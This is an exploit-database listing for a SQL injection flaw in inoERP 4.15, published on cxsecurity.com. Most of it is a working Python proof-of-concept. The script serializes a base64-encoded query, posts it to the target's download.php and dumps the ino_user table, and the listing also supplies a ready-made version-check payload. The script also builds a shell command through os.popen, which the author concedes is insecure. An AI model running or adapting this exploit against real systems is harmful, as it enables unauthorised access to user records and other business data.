inoERP 4.15 SQL Injection

2019.09.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: inoERP 4.15 - 'download' SQL Injection # Date: 2019-09-13 # Exploit Author: Semen Alexandrovich Lyhin # Vendor Homepage: http://inoideas.org/ # Version: 4.15 # CVE: N/A # A malicious query can be sent in base64 encoding to unserialize() function. # It can be deserialized as an array without any sanitization then. # After it, each element of the array is passed directly to the SQL query. #!/bin/python import os import base64 import requests import sys def generatePayload(query): #THIS FUNCTION IS INSECURE BY DESIGN b64_query = base64.b64encode(query); return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read() def ExecSQL(query): data = {"data":query, "data_type":"sql_query"} r = requests.post("http://" + ip + "/download.php", data=data) return r.content if __name__ == "__main__": if len(sys.argv) != 3: print '(+) usage: %s <target> ' % sys.argv[0] print '(+) eg: %s 127.0.0.1 "ierp/" ' % sys.argv[0] exit() ip = sys.argv[1] + "/" + sys.argv[2] #if don't have php, set Payload to the next one to check this SQLi via "select @@version;" payload: czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw== data = r"select * from ino_user;" print ExecSQL(generatePayload(data));


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top